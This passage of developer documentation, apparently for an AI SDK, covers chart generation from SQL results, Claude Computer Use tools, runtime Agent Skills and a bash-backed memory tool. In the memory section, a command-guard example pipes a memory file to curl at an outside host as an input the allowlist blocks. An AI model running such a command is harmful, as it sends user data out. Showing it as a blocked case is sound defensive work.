Let's start by defining the schema for the chart configuration in lib/types.ts:
/* ...rest of the file... */
export const configSchema = z
.object({
description: z
.string()
.describe(
'Describe the chart. What is it showing? What is interesting about the way the data is displayed?',
),
takeaway: z.string().describe('What is the main takeaway from the chart?'),
type: z.enum(['bar', 'line', 'area', 'pie']).describe('Type of chart'),
title: z.string(),
xKey: z.string().describe('Key for x-axis or category'),
yKeys: z
.array(z.string())
.describe(
'Key(s) for y-axis values; this is typically the quantitative column',
),
multipleLines: z
.boolean()
.describe(
'For line charts only: whether the chart is comparing groups of data.',
)
.optional(),
measurementColumn: z
.string()
.describe(
'For line charts only: key for quantitative y-axis column to measure against (eg. values, counts etc.)',
)
.optional(),
lineCategories: z
.array(z.string())
.describe(
'For line charts only: Categories used to compare different lines or data series. Each category represents a distinct line in the chart.',
)
.optional(),
colors: z
.record(
z.string().describe('Any of the yKeys'),
z.string().describe('Color value in CSS format (e.g., hex, rgb, hsl)'),
)
.describe('Mapping of data keys to color values for chart elements')
.optional(),
legend: z.boolean().describe('Whether to show legend'),
})
.describe('Chart configuration object');
export type Config = z.infer<typeof configSchema>;
This schema makes extensive use of Zod's .describe() function to give the model extra context about each of the keys you are expecting in the chart configuration. This will help the model understand the purpose of each key and generate more accurate results.
Another important technique to note here is that you are defining description and takeaway fields. Not only are these useful for the user to quickly understand what the chart means and what they should take away from it, but they also force the model to generate a description of the data first, before it attempts to generate configuration attributes like axis and columns. This will help the model generate more accurate and relevant chart configurations.
Create the Server Action
Create a new action in app/actions.ts:
/* ...other imports... */
import { Config, configSchema, explanationSchema, Result } from '@/lib/types';
/* ...rest of the file... */
export const generateChartConfig = async (
results: Result[],
userQuery: string,
) => {
'use server';
try {
const { output: config } = await generateText({
model: 'openai/gpt-4o',
system: 'You are a data visualization expert.',
prompt: `Given the following data from a SQL query result, generate the chart config that best visualizes the data and answers the user's query.
For multiple groups use multi-lines.
Here is an example complete config:
export const chartConfig = {
type: "pie",
xKey: "month",
yKeys: ["sales", "profit", "expenses"],
colors: {
sales: "#4CAF50", // Green for sales
profit: "#2196F3", // Blue for profit
expenses: "#F44336" // Red for expenses
},
legend: true
}
User Query:
${userQuery}
Data:
${JSON.stringify(results, null, 2)}`,
output: Output.object({ schema: configSchema }),
});
// Override with shadcn theme colors
const colors: Record<string, string> = {};
config.yKeys.forEach((key, index) => {
colors[key] = `hsl(var(--chart-${index + 1}))`;
});
const updatedConfig = { ...config, colors };
return { config: updatedConfig };
} catch (e) {
console.error(e);
throw new Error('Failed to generate chart suggestion');
}
};
Update the chart component
With the action in place, you'll want to trigger it automatically after receiving query results. This ensures the visualization appears almost immediately after data loads.
Update the handleSubmit function in your root page (app/page.tsx) to generate and set the chart configuration after running the query:
/* ...other imports... */
import { runGeneratedSQLQuery, generateQuery, generateChartConfig } from './actions';
/* ...rest of the file... */
const handleSubmit = async (suggestion?: string) => {
clearExistingData();
const question = suggestion ?? inputValue;
if (inputValue.length === 0 && !suggestion) return;
if (question.trim()) {
setSubmitted(true);
}
setLoading(true);
setLoadingStep(1);
setActiveQuery('');
try {
const query = await generateQuery(question);
if (query === undefined) {
toast.error('An error occurred. Please try again.');
setLoading(false);
return;
}
setActiveQuery(query);
setLoadingStep(2);
const companies = await runGeneratedSQLQuery(query);
const columns = companies.length > 0 ? Object.keys(companies[0]) : [];
setResults(companies);
setColumns(columns);
setLoading(false);
const { config } = await generateChartConfig(companies, question);
setChartConfig(config);
} catch (e) {
toast.error('An error occurred. Please try again.');
setLoading(false);
}
};
/* ...rest of the file... */
Now when users submit queries, the application will:
- Generate and run the SQL query
- Display the table results
- Generate a chart configuration for the results
- Allow toggling between table and chart views
Head back to the browser and test the application with a few queries. You should see the chart visualization appear after the table results.
Next steps
You've built an AI-powered SQL analysis tool that can convert natural language to SQL queries, visualize query results, and explain SQL queries in plain English.
You could, for example, extend the application to use your own data sources or add more advanced features like customizing the chart configuration schema to support more chart types and options. You could also add more complex SQL query generation capabilities.
title: Get started with Computer Use description: Get started with Claude's Computer Use capabilities with the AI SDK tags: ['computer-use', 'tools']
Get started with Computer Use
With the release of Computer Use in Claude 3.5 Sonnet, you can now direct AI models to interact with computers like humans do - moving cursors, clicking buttons, and typing text. This capability enables automation of complex tasks while leveraging Claude's advanced reasoning abilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Anthropic's Claude alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more. In this guide, you will learn how to integrate Computer Use into your AI SDK applications.
Computer Use
Anthropic recently released a new version of the Claude 3.5 Sonnet model which is capable of 'Computer Use'. This allows the model to interact with computer interfaces through basic actions like:
- Moving the cursor
- Clicking buttons
- Typing text
- Taking screenshots
- Reading screen content
How It Works
Computer Use enables the model to read and interact with on-screen content through a series of coordinated steps. Here's how the process works:
- Start with a prompt and tools: Add Anthropic-defined Computer Use tools to your request and provide a task (prompt) for the model. For example: "save an image to your downloads folder."
- Select the right tool: The model evaluates which computer tools can help accomplish the task. It then sends a formatted tool_call to use the appropriate tool.
- Execute the action and return results: The AI SDK processes Claude's request by running the selected tool. The results can then be sent back to Claude through a tool_result message.
- Complete the task through iterations: Claude analyzes each result to determine if more actions are needed. It continues requesting tool use and processing results until it completes your task or requires additional input.
Available Tools
There are three main tools available in the Computer Use API:
- Computer Tool: Enables basic computer control like mouse movement, clicking, and keyboard input
- Text Editor Tool: Provides functionality for viewing and editing text files
- Bash Tool: Allows execution of bash commands
Implementation Considerations
Computer Use tools in the AI SDK are predefined interfaces that require your own implementation of the execution layer. While the SDK provides the type definitions and structure for these tools, you need to:
- Set up a controlled environment for Computer Use execution
- Implement core functionality like mouse control and keyboard input
- Handle screenshot capture and processing
- Set up rules and limits for how Claude can interact with your system
The recommended approach is to start with Anthropic's reference implementation, which provides:
- A containerized environment configured for safe Computer Use
- Ready-to-use (Python) implementations of Computer Use tools
- An agent loop for API interaction and tool execution
- A web interface for monitoring and control
This reference implementation serves as a foundation to understand the requirements before building your own custom solution.
Getting Started with the AI SDK
First, ensure you have the AI SDK and Anthropic AI SDK provider installed:
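<Snippet text={['pnpm add ai @ai-sdk/anthropic']} />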
You can add Computer Use to your AI SDK applications using provider-defined-client tools. These tools accept various input parameters (like display height and width in the case of the computer tool) and then require that you define an execute function.
Here's how you could set up the Computer Tool with the AI SDK:
import { anthropic } from '@ai-sdk/anthropic';
import { getScreenshot, executeComputerAction } from '@/utils/computer-use';
const computerTool = anthropic.tools.computer_20250124({
displayWidthPx: 1920,
displayHeightPx: 1080,
execute: async ({ action, coordinate, text }) => {
switch (action) {
case 'screenshot': {
return {
type: 'image',
data: getScreenshot(),
};
}
default: {
return executeComputerAction(action, coordinate, text);
}
}
},
toModelOutput({ output }) {
return typeof output === 'string'
? [{ type: 'text', text: output }]
: [{ type: 'image', data: output.data, mediaType: 'image/png' }];
},
});
The computerTool handles two main actions: taking screenshots via getScreenshot() and executing computer actions like mouse movements and clicks through executeComputerAction(). Remember, you have to implement this execution logic (e.g. the getScreenshot and executeComputerAction functions) to handle the actual computer interactions. The execute function should handle all low-level interactions with the operating system.
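The shape of these helpers is entirely up to you. The signatures below are a sketch inferred from how they are called above; the function bodies, and the utils/computer-use module itself, are assumptions you would replace with your own implementation:
// utils/computer-use.ts (hypothetical; adapt to your environment)
export function getScreenshot(): string {
  // Capture the display and return it as a base64-encoded PNG string,
  // e.g. via a screenshot utility inside your sandboxed VM.
  throw new Error('Implement screenshot capture for your environment');
}

export async function executeComputerAction(
  action: string,
  coordinate: [number, number] | undefined,
  text: string | undefined,
): Promise<string> {
  // Translate the model's requested action ('mouse_move', 'left_click',
  // 'type', ...) into OS-level input events and return a text result.
  throw new Error('Implement computer control for your environment');
}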
Finally, to send tool results back to the model, use the toModelOutput() function to convert text and image responses into a format the model can process. The AI SDK includes experimental support for these multi-modal tool results when using Anthropic's models.
Using Computer Tools with Text Generation
Once your tool is defined, you can use it with both the generateText and streamText functions.
For one-shot text generation, use generateText:
const result = await generateText({
model: 'anthropic/claude-sonnet-4-20250514',
prompt: 'Move the cursor to the center of the screen and take a screenshot',
tools: { computer: computerTool },
});
console.log(result.text);
For streaming responses, use streamText to receive updates in real-time:
const result = streamText({
model: 'anthropic/claude-sonnet-4-20250514',
prompt: 'Open the browser and navigate to vercel.com',
tools: { computer: computerTool },
});
for await (const chunk of result.textStream) {
console.log(chunk);
}
Configure Multi-Step (Agentic) Generations
To allow the model to perform multiple steps without user intervention, use the stopWhen parameter. This will automatically send any tool results back to the model to trigger a subsequent generation:
import { stepCountIs } from 'ai';
const stream = streamText({
model: 'anthropic/claude-sonnet-4-20250514',
prompt: 'Open the browser and navigate to vercel.com',
tools: { computer: computerTool },
stopWhen: stepCountIs(10), // experiment with this value based on your use case
});
Combine Multiple Tools
You can combine multiple tools in a single request to enable more complex workflows. The AI SDK supports all three of Claude's Computer Use tools:
const computerTool = anthropic.tools.computer_20250124({
...
});
const bashTool = anthropic.tools.bash_20250124({
  // Requires: import { execSync } from 'node:child_process';
  execute: async ({ command, restart }) => execSync(command).toString(),
});
const textEditorTool = anthropic.tools.textEditor_20250124({
execute: async ({
command,
path,
file_text,
insert_line,
new_str,
insert_text,
old_str,
view_range
}) => {
// Handle file operations by delegating to your own implementation
// based on the command (view, create, str_replace, insert, ...)
return executeTextEditorFunction({
  command,
  path,
  fileText: file_text,
  insertLine: insert_line,
  newStr: new_str,
  insertText: insert_text,
  oldStr: old_str,
  viewRange: view_range,
});
}
});
const response = await generateText({
model: 'anthropic/claude-sonnet-4-20250514',
prompt: "Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
tools: {
computer: computerTool,
bash: bashTool,
str_replace_editor: textEditorTool,
},
});
Best Practices for Computer Use
To get the best results when using Computer Use:
- Specify simple, well-defined tasks with explicit instructions for each step
- Prompt Claude to verify outcomes through screenshots
- Use keyboard shortcuts when UI elements are difficult to manipulate
- Include example screenshots for repeatable tasks
- Provide explicit tips in system prompts for known tasks
Security Measures
Remember, Computer Use is a beta feature. Please be aware that it poses unique risks that are distinct from standard API features or chat interfaces. These risks are heightened when using Computer Use to interact with the internet. To minimize risks, consider taking precautions such as:
- Use a dedicated virtual machine or container with minimal privileges to prevent direct system attacks or accidents.
- Avoid giving the model access to sensitive data, such as account login information, to prevent information theft.
- Limit internet access to an allowlist of domains to reduce exposure to malicious content.
- Ask a human to confirm decisions that may result in meaningful real-world consequences as well as any tasks requiring affirmative consent, such as accepting cookies, executing financial transactions, or agreeing to terms of service.
title: Add Skills to Your Agent description: Learn how to extend your agent with specialized capabilities loaded at runtime with Agent Skills. tags: ['agent', 'skills', 'tools', 'extensibility']
Add Skills to Your Agent
In this guide, you will learn how to extend your agent with Agent Skills, a lightweight, open format for adding specialized knowledge and workflows that load at runtime from markdown files.
At its core, a skill is a folder containing a SKILL.md file with metadata and instructions that tell an agent how to perform a specific task.
my-skill/
├── SKILL.md # Required: instructions + metadata
├── scripts/ # Optional: executable code
├── references/ # Optional: documentation
└── assets/ # Optional: templates, resources
How Skills Work
Skills use progressive disclosure to manage context efficiently:
- Discovery: At startup, agents load only the name and description of each available skill (just enough to know when it might be relevant)
- Activation: When a task matches a skill's description, the agent reads the full SKILL.md instructions into context
- Execution: The agent follows the instructions, optionally loading referenced files or executing bundled code as needed
This approach keeps agents fast while giving them access to more context on demand.
The SKILL.md File
Every skill starts with a SKILL.md file containing YAML frontmatter and Markdown instructions:
---
name: pdf-processing
description: Extract text and tables from PDF files, fill forms, merge documents.
---
# PDF Processing
## When to use this skill
Use this skill when the user needs to work with PDF files...
## How to extract text
1. Use pdfplumber for text extraction...
## How to fill forms
...
The frontmatter requires:
- name: A short identifier
- description: Instructions for when to use this skill
The Markdown body contains the actual skill content with no restrictions on structure or content.
Prerequisites
To support skills, your agent needs:
- Filesystem access to discover and load skill files (read files, read directories)
- A load skill tool that reads the SKILL.md content into context
- Command execution (optional) if skills bundle scripts (e.g. a full sandbox environment)
Step 1: Define a Sandbox Abstraction
Create a generic sandbox interface that provides a consistent way to interact with the filesystem. This abstraction lets you implement it differently depending on your environment (Node.js fs, a containerized sandbox, cloud storage, etc.):
interface Sandbox {
readFile(path: string, encoding: 'utf-8'): Promise<string>;
readdir(
path: string,
opts: { withFileTypes: true },
): Promise<{ name: string; isDirectory(): boolean }[]>;
exec(command: string): Promise<{ stdout: string; stderr: string }>;
}
Step 2: Discover Skills at Startup
Scan skill directories and extract metadata from each SKILL.md:
interface SkillMetadata {
name: string;
description: string;
path: string;
}
async function discoverSkills(
sandbox: Sandbox,
directories: string[],
): Promise<SkillMetadata[]> {
const skills: SkillMetadata[] = [];
const seenNames = new Set<string>();
for (const dir of directories) {
let entries;
try {
entries = await sandbox.readdir(dir, { withFileTypes: true });
} catch {
continue; // Skip directories that don't exist
}
for (const entry of entries) {
if (!entry.isDirectory()) continue;
const skillDir = `${dir}/${entry.name}`;
const skillFile = `${skillDir}/SKILL.md`;
try {
const content = await sandbox.readFile(skillFile, 'utf-8');
const frontmatter = parseFrontmatter(content);
// First skill with a given name wins (allows project overrides)
if (seenNames.has(frontmatter.name)) continue;
seenNames.add(frontmatter.name);
skills.push({
name: frontmatter.name,
description: frontmatter.description,
path: skillDir,
});
} catch {
continue; // Skip skills without valid SKILL.md
}
}
}
return skills;
}
function parseFrontmatter(content: string) {
const match = content.match(/^---\r?\n([\s\S]*?)\r?\n---/);
if (!match?.[1]) throw new Error('No frontmatter found');
// Parse YAML using your preferred library (e.g. import yaml from 'yaml')
return yaml.parse(match[1]);
}
Step 3: Build the System Prompt
Include discovered skills in the system prompt so the agent knows what's available:
function buildSkillsPrompt(skills: SkillMetadata[]): string {
const skillsList = skills
.map(s => `- ${s.name}: ${s.description}`)
.join('\n');
return `
## Skills
Use the \`loadSkill\` tool to load a skill when the user's request
would benefit from specialized instructions.
Available skills:
${skillsList}
`;
}
The agent sees only names and descriptions. Full instructions stay out of the context window until loaded.
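As a quick sanity check, you can render the prompt for whatever skills were discovered. A usage sketch, assuming the discoverSkills function from Step 2 and the pdf-processing skill from earlier:
const skills = await discoverSkills(sandbox, ['.agents/skills']);
console.log(buildSkillsPrompt(skills));
// Available skills:
// - pdf-processing: Extract text and tables from PDF files, fill forms, merge documents.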
Step 4: Create the Load Skill Tool
The load skill tool reads the full SKILL.md and returns the body (without frontmatter):
function stripFrontmatter(content: string): string {
const match = content.match(/^---\r?\n[\s\S]*?\r?\n---\r?\n?/);
return match ? content.slice(match[0].length).trim() : content.trim();
}
const loadSkillTool = tool({
description: 'Load a skill to get specialized instructions',
inputSchema: z.object({
name: z.string().describe('The skill name to load'),
}),
execute: async ({ name }, { context }) => {
const { sandbox, skills } = context as {
sandbox: Sandbox;
skills: SkillMetadata[];
};
const skill = skills.find(s => s.name.toLowerCase() === name.toLowerCase());
if (!skill) {
return { error: `Skill '${name}' not found` };
}
const skillFile = `${skill.path}/SKILL.md`;
const content = await sandbox.readFile(skillFile, 'utf-8');
const body = stripFrontmatter(content);
return {
skillDirectory: skill.path,
content: body,
};
},
});
The tool returns the skill directory path alongside the content so the agent can construct full paths to bundled resources.
Step 5: Create the Agent
Wire up the sandbox and skills using callOptionsSchema and prepareCall:
const callOptionsSchema = z.object({
sandbox: z.custom<Sandbox>(),
skills: z.array(
z.object({
name: z.string(),
description: z.string(),
path: z.string(),
}),
),
});
const readFileTool = tool({
description: 'Read a file from the filesystem',
inputSchema: z.object({ path: z.string() }),
execute: async ({ path }, { context }) => {
const { sandbox } = context as { sandbox: Sandbox };
return sandbox.readFile(path, 'utf-8');
},
});
const bashTool = tool({
description: 'Execute a bash command',
inputSchema: z.object({ command: z.string() }),
execute: async ({ command }, { context }) => {
const { sandbox } = context as { sandbox: Sandbox };
return sandbox.exec(command);
},
});
const agent = new ToolLoopAgent({
model: yourModel,
tools: {
loadSkill: loadSkillTool,
readFile: readFileTool,
bash: bashTool,
},
callOptionsSchema,
prepareCall: ({ options, ...settings }) => ({
...settings,
instructions: `${settings.instructions}\n\n${buildSkillsPrompt(options.skills)}`,
context: {
sandbox: options.sandbox,
skills: options.skills,
},
}),
});
Step 6: Run the Agent
// Create sandbox (your filesystem/execution abstraction)
const sandbox = createSandbox({ workingDirectory: process.cwd() });
// Discover skills at startup
const skills = await discoverSkills(sandbox, [
'.agents/skills',
'~/.config/agent/skills',
]);
// Run the agent
const result = await agent.run({
prompt: userMessage,
options: { sandbox, skills },
});
When a user asks something that matches a skill description, the agent calls loadSkill. The full instructions load into context, and the agent follows them using bash and readFile to access bundled resources.
Accessing Bundled Resources
Skills can reference files relative to their directory. The agent uses existing tools to access them:
Skill directory: /path/to/.agents/skills/my-skill
# My Skill Instructions
Read the configuration template:
templates/config.json
Run the setup script:
bash scripts/setup.sh
The agent sees the skill directory path in the tool result and prepends it when accessing templates/config.json or scripts/setup.sh. No special resource loading mechanism is needed—the agent uses the same tools it uses for everything else.
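Concretely, if loadSkill returned skillDirectory: '/path/to/.agents/skills/my-skill', the agent might issue ordinary tool calls like these (illustrative shapes, mirroring the tools defined in Step 5):
{ "tool": "readFile", "input": { "path": "/path/to/.agents/skills/my-skill/templates/config.json" } }
{ "tool": "bash", "input": { "command": "bash /path/to/.agents/skills/my-skill/scripts/setup.sh" } }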
Learn More
- Agent Skills specification for the full format details
- Example skills on GitHub
- Authoring best practices for writing effective skills
- Reference library to validate skills and generate prompt XML
- skills.sh to browse and discover community skills
title: Build a Custom Memory Tool description: Build an agent that persists memories using a filesystem-backed memory tool.
Build a Custom Memory Tool
Memory means saving the right information at the right time, in the right place, and injecting it back into the conversation when it matters. Without memory, your agent treats every conversation as its first. With memory, your agent builds context over time, recalls previous interactions, and adapts to the user.
The Storage Primitive: The Filesystem
Where should you store memories? Files organized in a filesystem-like structure are a natural fit:
- Persistence: you can persist files across process restarts and conversations
- Speed: reading and writing files is fast, even at scale
- Familiarity: language models understand files and paths from their training data
- Hierarchy: you can use a directory structure to create deep and organized memory banks, grouping memories by topic, time, or type
The key insight is that "filesystem" here is an abstraction. The backing store does not matter. You could use a real sandboxed filesystem, an in-memory virtual filesystem, or a shim over Postgres. What matters is the concept: files organized in a hierarchical structure, and an interface that can manipulate, search, read, and edit those files. That is the primitive.
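As a sketch, the surface area such a store needs is small. The interface below is an illustration of the concept, not a required API; any implementation that can express these operations over a hierarchy of paths will work:
// Illustrative only: back this with a real filesystem, an in-memory
// virtual filesystem, or a shim over a database like Postgres.
interface MemoryStore {
  read(path: string): Promise<string>;
  write(path: string, content: string): Promise<void>;
  append(path: string, content: string): Promise<void>;
  list(dir: string): Promise<string[]>;
  search(dir: string, query: string): Promise<string[]>;
}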
The Interface: A Memory Tool
You have files. Now the model needs to interact with them. You give the model a tool, along with instructions for when and how to use it. There are two approaches:
Structured Actions Tool
Define explicit actions the model can take (view, create, update, search) and have the model generate structured input that you handle yourself:
{
"name": "memory",
"input": {
"command": "view",
"path": "/memories/customer_service_guidelines.xml"
}
}
This is safe by design since you control every operation that runs. However, it requires more upfront implementation and limits the model to only the actions you have built.
Bash-Backed Tool
The alternative is to back the memory tool with bash. Models are proficient at composing shell commands, which lets them craft flexible queries to access what they need: cat a file, grep for patterns, pipe commands together, or perform in-place edits with sed. This is the more powerful approach, but it requires careful work to build an approval system that prevents prompt injection and blocks dangerous commands.
Types of Memory
Not all memories are equal. They differ in how you store them, how often the model accesses them, and when they surface:
- Core Memory: information included in every turn. This can range from the user's name to instructions for where to find other memories. You inject core memory directly into the system prompt, so the model always has it without needing a tool call.
- Archival Memory: a notes folder or file where the model stores detailed knowledge. Think of it as the model's notebook, where it writes down facts, summaries, and observations for later. The model reads and writes archival memory on demand through the memory tool.
- Recall Memory: the conversations themselves. By persisting full turn-by-turn history, the model can search previous interactions to surface relevant context from past discussions.
These memory terms are based on Letta's definitions.
What We Will Build
This recipe is a simplified demonstration of these concepts. You build one memory tool over a shared .memory store, then wire it into an agent with prepareCall so core memory is injected before each model call. You can implement the tool with structured actions or with a bash-backed interface.
The memory layout is a .memory directory with three files, each mapping to one of the memory types above:
.memory/
├── core.md # Core memory, injected every turn
├── notes.md # Archival memory, timestamped notes
└── conversations.jsonl # Recall memory, full turn history (JSONL)
Prerequisites
To follow this guide, you need the following:
- AI SDK with ToolLoopAgent and tool
- Zod for tool input schemas
- Optional for Route B (bash-backed): just-bash for command execution and AST parsing
Install dependencies for both routes:
pnpm add ai just-bash zod
If you only use Route A (structured actions), you can skip just-bash.
Implementation Requirements
Before building the agent, you need shared infrastructure plus one route-specific piece:
- Bootstrap the filesystem. On startup, ensure the memory directory and its files exist with reasonable defaults. This is a one-time setup step: create the directory if missing, seed each file with starter content if it does not already exist, and add the memory directory to .gitignore to keep it local and private.
- Helper functions for core memory and conversation logging. You need a way to read core memory (so you can inject it into the system prompt) and a way to append conversation entries. Conversations are stored as JSONL (one JSON object per line), which makes them straightforward to grep for keywords and pipe through jq for formatting.
- Route-specific execution safety.
  - Route A (structured actions): keep the action set small and explicit (view, create, update, search) and only operate on known .memory paths.
  - Route B (bash-backed): validate commands before execution. Users can craft prompts that try to run harmful commands, so use AST-based validation and an allowlist. See the Appendix for a full implementation with just-bash.
Step 1: Define the Memory Tool
Choose your tool interface first. Both routes use the same .memory files, the same prepareCall injection pattern, and the same conversation logging. The only difference is how the model issues memory operations.
Route A: Structured Actions Tool
Use this when you want predictable, explicit operations (view, create, update, search) and minimal command-safety surface.
Define a schema and route every request through your own runMemoryCommand handler:
import { tool } from 'ai';
import { z } from 'zod';
const memoryInputSchema = z.object({
command: z
.enum(['view', 'create', 'update', 'search'])
.describe(
'Memory action: view to read, create to write new content, update to change existing content, search to find relevant lines.',
),
path: z
.string()
.optional()
.describe(
'Memory path under /memories, such as /memories/core.md or /memories/notes.md. Required for view, create, and update.',
),
content: z
.string()
.optional()
.describe('Text to write for create or update commands.'),
mode: z
.enum(['append', 'overwrite'])
.optional()
.describe(
'Write mode for update: append adds to existing content, overwrite replaces it. Defaults to overwrite.',
),
query: z
.string()
.optional()
.describe(
'Search keywords for the search command. Prefer short focused terms.',
),
});
const memoryTool = tool({
description: `Use this tool to read and maintain long-term memory under /memories.
Rules:
- If the user prompt might depend on preferences, history, constraints, or goals, search first, then reply.
- If the prompt is fully self-contained or general knowledge, reply directly.
- Keep searches short and focused (1-4 words).
- Store durable user facts in /memories/core.md and detailed notes in /memories/notes.md.
- Keep memory operations invisible in user-facing replies.`,
inputSchema: memoryInputSchema,
execute: async input => {
try {
const output = await runMemoryCommand(input);
return { output };
} catch (error) {
return { output: `Memory action failed: ${(error as Error).message}` };
}
},
});
This keeps memory operations predictable because the model can only call predefined actions.
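For example, when the model wants to recall editor preferences, it emits structured input that your handler executes directly (a sketch using the runMemoryCommand handler from the Appendix):
const output = await runMemoryCommand({
  command: 'search',
  query: 'favorite editor',
});
// e.g. "core.md:3:- Favorite editor: Neovim"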
Route B: Bash-Backed Tool
Use this when you want maximum flexibility in reads, writes, and ad-hoc search.
import { tool } from 'ai';
import { Bash, ReadWriteFs } from 'just-bash';
import { z } from 'zod';
const fs = new ReadWriteFs({ root: process.cwd() });
const bash = new Bash({ fs, cwd: '/' });
const memoryTool = tool({
description: `Run bash commands only for memory-related tasks.
This tool is restricted to memory workflows. Do not use it for
general project work, code changes, dependency management, or
system administration.
Inside the tool, use paths under /.memory:
- /.memory/core.md for key facts that should be reused later
- /.memory/notes.md for detailed notes
- /.memory/conversations.jsonl for full turn history
Rules:
- Only perform memory-related reads/writes and conversation recall
- Keep /.memory/core.md short and focused
- Prefer append-friendly notes in /.memory/notes.md for details
- If the user asks about prior conversations, search
/.memory/conversations.jsonl for relevant keywords first
- Use >> to append, > to overwrite, and perl -pi -e for in-place edits
Examples:
- cat /.memory/core.md
- echo "- User prefers concise answers" >> /.memory/core.md
- perl -pi -e 's/concise answers/detailed answers/g' /.memory/core.md
- grep -n "project" /.memory/notes.md
- echo "2026-02-16: started a Rust CLI" >> /.memory/notes.md
- grep -niE "pricing|budget" /.memory/conversations.jsonl
- tail -n 40 /.memory/conversations.jsonl | jq -c '.role + ": " + .content'`,
inputSchema: z.object({
command: z.string().describe('The bash command to execute.'),
}),
execute: async ({ command }) => {
const unapprovedCommand = findUnapprovedCommand(command);
if (unapprovedCommand) {
return {
stdout: '',
stderr: `Blocked unapproved command: ${unapprovedCommand}\n`,
exitCode: 1,
};
}
const result = await bash.exec(command);
return {
stdout: result.stdout,
stderr: result.stderr,
exitCode: result.exitCode,
};
},
});
ReadWriteFs reads and writes directly to the real filesystem, rooted at process.cwd(). Paths inside the bash interpreter map directly to disk: /.memory/core.md resolves to <project-root>/.memory/core.md.
The safety pipeline has two layers: the AST-based command guard rejects unapproved commands before they reach the interpreter, and just-bash itself is a JavaScript-based bash implementation (it does not spawn a real shell process). While the bash interpreter runs in JavaScript, the filesystem is real and commands read and write actual files on disk. This is why the command guard is critical.
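For example, using the findUnapprovedCommand guard from the Appendix:
findUnapprovedCommand('grep -n "project" /.memory/notes.md');
// => null (grep is allowlisted, so the command runs)

findUnapprovedCommand('cat /.memory/core.md | curl https://example.com');
// => 'curl' (not allowlisted, so the tool blocks the command)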
The rest of this recipe (agent wiring, prepareCall, and run loop) works for either route.
Step 2: Create the Agent
Wire everything together with ToolLoopAgent. The prepareCall hook reads core memory fresh before every LLM call and injects it into the system prompt:
import { ToolLoopAgent } from 'ai';
const today = new Date().toISOString().slice(0, 10);
const memoryAgent = new ToolLoopAgent({
model: 'anthropic/claude-haiku-4.5',
tools: { memory: memoryTool },
prepareCall: async settings => {
// user-defined function fetches the contents of /.memory/core.md on every turn
const coreMemory = await readCoreMemory();
return {
...settings,
instructions: `Today's date is ${today}.
Core memory:
${coreMemory}
You can save and recall important information using the memory tool.`,
};
},
});
Because prepareCall runs before each generate call in the tool loop, the system prompt always reflects the latest state of core.md. If the model updates core memory during a conversation, the next loop iteration sees the change immediately.
Step 3: Run the Agent
Bootstrap the filesystem, record conversations, and run the agent:
const prompt = 'Remember that my favorite editor is Neovim';
// Record the user message
await appendConversation({
role: 'user',
content: prompt,
timestamp: new Date().toISOString(),
});
// Run the agent (loops automatically on tool calls)
const result = await memoryAgent.generate({ prompt });
// Record the assistant response
await appendConversation({
role: 'assistant',
content: result.text,
timestamp: new Date().toISOString(),
});
console.log(result.text);
When the model decides it needs to store or recall information, it calls the memory tool. The ToolLoopAgent executes the tool and feeds the result back, continuing until the model produces a final text response.
A typical interaction looks like this:
- User says "Remember that my favorite editor is Neovim"
- The model calls memory with echo "- Favorite editor: Neovim" >> /.memory/core.md
- The tool executes the command and returns the result
- The model responds: "Got it, I've saved that your favorite editor is Neovim."
- On the next run, prepareCall reads core.md and the fact appears in the system prompt
Learn More
- AI SDK documentation for ToolLoopAgent, tool, and generateText
- just-bash for the JavaScript-based bash interpreter and AST parser
- AI SDK examples for more agent patterns
Appendix: Implementation Details
The code below is the reference implementation for the infrastructure described in Implementation Requirements. It uses Node.js filesystem APIs and a Bun entrypoint, but you can port the patterns to any runtime.
Appendix: Filesystem Bootstrap
Define the memory directory structure and bootstrap it on startup. Each file gets reasonable defaults if it does not already exist:
import {
access,
appendFile,
mkdir,
readFile,
writeFile,
} from 'node:fs/promises';
import { join, resolve } from 'node:path';
const MEMORY_DIR = '.memory';
const MEMORY_ROOT = resolve(process.cwd(), MEMORY_DIR);
const CORE_MEMORY_PATH = join(MEMORY_ROOT, 'core.md');
const NOTES_PATH = join(MEMORY_ROOT, 'notes.md');
const CONVERSATIONS_PATH = join(MEMORY_ROOT, 'conversations.jsonl');
const DEFAULT_CORE_MEMORY = `# Core Memory
- Keep this short.
- Put stable user facts here.
`;
const DEFAULT_NOTES = `# Notes
Use this file for detailed memories and timestamped notes.
`;
async function ensureFile(path: string, content: string): Promise<void> {
try {
await access(path);
} catch {
await writeFile(path, content, 'utf8');
}
}
async function ensureMemoryFilesystem(): Promise<void> {
await mkdir(MEMORY_ROOT, { recursive: true });
await ensureFile(CORE_MEMORY_PATH, DEFAULT_CORE_MEMORY);
await ensureFile(NOTES_PATH, DEFAULT_NOTES);
await ensureFile(CONVERSATIONS_PATH, '');
}
Add .memory to your .gitignore to keep memory local and private.
Appendix: Helper Functions
One helper reads core memory for system prompt injection, the other appends conversation entries as JSONL:
async function readCoreMemory(): Promise<string> {
try {
return await readFile(CORE_MEMORY_PATH, 'utf8');
} catch {
return '';
}
}
async function appendConversation(entry: {
role: 'user' | 'assistant';
content: string;
timestamp: string;
}): Promise<void> {
await appendFile(CONVERSATIONS_PATH, `${JSON.stringify(entry)}\n`, 'utf8');
}
Appendix: Structured Actions Handler
The runMemoryCommand function used in Route A maps each action to a filesystem operation. Paths are resolved relative to the memory root, and only known memory files are allowed:
import { readFile, writeFile, appendFile } from 'node:fs/promises';
import { join, relative } from 'node:path';
const MEMORY_FILES = ['core.md', 'notes.md', 'conversations.jsonl'];
function resolveMemoryPath(path: string): string {
const relativePath = path
.trim()
.replace(/^\/?memories\/?/, '')
.replace(/^\/?\.memory\/?/, '')
.replace(/^\/+/, '');
if (!MEMORY_FILES.includes(relativePath)) {
throw new Error(`Unsupported memory path: ${path}`);
}
return join(MEMORY_ROOT, relativePath);
}
async function runMemoryCommand(input: {
command: 'view' | 'create' | 'update' | 'search';
path?: string;
content?: string;
mode?: 'append' | 'overwrite';
query?: string;
}): Promise<string> {
const { command, path, content, mode, query } = input;
switch (command) {
case 'view': {
if (!path) throw new Error('path is required for view');
return await readFile(resolveMemoryPath(path), 'utf8');
}
case 'create':
case 'update': {
if (!path) throw new Error('path is required');
if (!content) throw new Error('content is required');
const target = resolveMemoryPath(path);
if (mode === 'append') {
await appendFile(target, content, 'utf8');
} else {
await writeFile(target, content, 'utf8');
}
return `${command === 'create' ? 'Created' : 'Updated'} ${path}`;
}
